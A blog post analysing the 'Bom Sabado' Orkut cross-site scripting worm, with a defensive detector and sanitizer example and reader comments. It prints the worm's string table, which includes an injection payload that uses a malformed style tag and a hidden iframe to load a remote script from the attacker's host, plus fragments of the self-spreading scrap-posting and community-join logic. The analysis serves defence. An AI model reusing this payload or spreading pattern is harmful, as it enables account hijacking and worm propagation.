A preliminary analysis of “Bom Sabado” orkut worm

So, this morning I received an email saying I had received an orkut scrap from a friend with the contents “Bom Sabado”.
Within a minute I received the same scrap from another friend. Now getting the feeling that this must be some sort of worm, I decided to open Orkut with Firebug logging enabled to see what was going on.
It turns out that it is a typical case of Cross-Site Scripting (XSS): the attacker is able to include and execute their own script from hxxp://tptools.org/worm.js, and the contents of the scrap are able to bypass Orkut's sanitization.

What it does
As soon as someone logs in and visits their scrapbook page:

  1. The same scrap is automatically posted to all of the victim's friends.
  2. The script automatically joins a set of communities (in fact, it seems that visiting one of these communities is sufficient to get infected) with community IDs 106698808, 6, 558494, 106698628, 106691341.

How to protect yourself

  1. Use an ad-blocker to block access to hxxp://tptools.org/worm.js
  2. Do not visit any of the aforementioned communities.

How it works (spreads)

The script at the aforementioned URL is obfuscated; simplifying it shows that the script is built from the following string table, held in a single variable:

var _0x37a1 = [Microsoft.XMLHttp,POST_TOKEN=,CGI.POST_TOKEN,&signature=, Page.signature.raw,POST,Scrapbook?,open, Content-Type,application/x-www-form-urlencoded;, setRequestHeader,&scrapText=,<style/><iframe style=display:none onload="a = document.createElement( 'script');a.src = '/' + '/tptools.o'+'rg/worm.js'+'#<wbr>#'; document . body . appendChild( a )"></iframe>Bom Sabado!,&uid=,
&Action.submit=1,send,GET,RequestFriends?req=fl&uid=,uid,&oxh=1,while (true); &&&START&&&,,replace,responseText,CommunityJoin?cmm=,&Action.join=1, 106698808,6,558494,106698628,106691341,var friends = ,;,list,data,id]

  1. It seems that an ill-formed <style/> tag is able to escape Google's sanitization mechanism, resulting in the scrap text being parsed as HTML (I might be wrong about this).
  2. The list of community IDs near the end of the table shows the communities to which this script automatically sends join requests.
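To make the two points above concrete, here is an added example (not code from the original post): a small detector that flags the markup features the scrap payload relies on, and an allowlist sanitizer that escapes everything except bare <b>, <i> and <u> tags, both run over constructed scraps, one of which is the payload quoted in the post. The rule names and the sanitizer design are my own assumptions, not a description of Orkut's real filter.

```javascript
// Added example, not code from the original post: a detector for the markup
// tricks the Bom Sabado scrap relies on, plus an allowlist sanitizer, run over
// constructed scraps (one of them the payload quoted in the post).

// Each rule names one feature of the scrap payload that a scrap should never contain.
const RULES = [
  { name: "self-closing-style",   re: /<style\s*\/>/i },                       // the <style/> that slipped past sanitization
  { name: "inline-event-handler", re: /<[^>]*\son[a-z]+\s*=/i },               // onload=, onerror=, ...
  { name: "active-element",       re: /<\s*(iframe|script|object|embed)\b/i },
  { name: "dynamic-script-load",  re: /createElement\s*\(\s*['"]script['"]\s*\)/i },
  { name: "split-string-url",     re: /['"]\s*\+\s*['"]/ },                    // 'tptools.o'+'rg' style URL splitting
];

// Returns the names of every rule the scrap text triggers (empty array = clean).
function scanScrap(text) {
  return RULES.filter(r => r.re.test(text)).map(r => r.name);
}

const ESC = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Allowlist approach (assumed design): escape everything, then re-enable only
// bare <b>, <i>, <u>. A tag with attributes, or any other element, stays
// escaped text, so a malformed tag cannot switch the parser into HTML mode.
function sanitizeScrap(text) {
  const escaped = text.replace(/[&<>"']/g, c => ESC[c]);
  return escaped.replace(/&lt;(\/?)(b|i|u)&gt;/gi, "<$1$2>");
}

// Constructed sample scraps; WORM_SCRAP is the payload quoted in the post.
const BENIGN_SCRAP = "<b>Bom Sabado!</b> Have a nice weekend :)";
const WORM_SCRAP =
  "<style/><iframe style=display:none onload=\"a = document.createElement( 'script');" +
  "a.src = '/' + '/tptools.o'+'rg/worm.js'+'#<wbr>#'; document . body . appendChild( a )\"></iframe>Bom Sabado!";

console.log(scanScrap(BENIGN_SCRAP));                 // []
console.log(scanScrap(WORM_SCRAP));                   // all five rule names
console.log(sanitizeScrap(WORM_SCRAP));               // starts with &lt;style/&gt;&lt;iframe
console.log(scanScrap(sanitizeScrap(WORM_SCRAP)));    // []
```

The detector is only a triage aid for scraps already stored; the sanitizer shows why escaping by default and allowlisting a few bare tags is safer than trying to strip known-bad tags from untrusted HTML.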

UPDATE: It seems that the website tptools.org has been taken down by the hosting company (HostGator).
The original script and a commented version are attached for interested readers.

6 Replies to “A preliminary analysis of “Bom Sabado” orkut worm”

  1. A preliminary analysis of “Bom Sabado” orkut worm « Ashish Bhatia…

    I found your entry interesting so I’ve added a Trackback to it on my weblog :)…

  2. Thanks Rajesh.

  3. So, that’s what you are doing nowadays.

  4. Yeah, sort of.

  5. It’s not so detailed, dude, nor is the code given by you the exact full code.

  6. 1) It is a preliminary analysis (I posted it when the worm was at its peak).
    2) The code is full (please clarify why you think something is missing from the code).
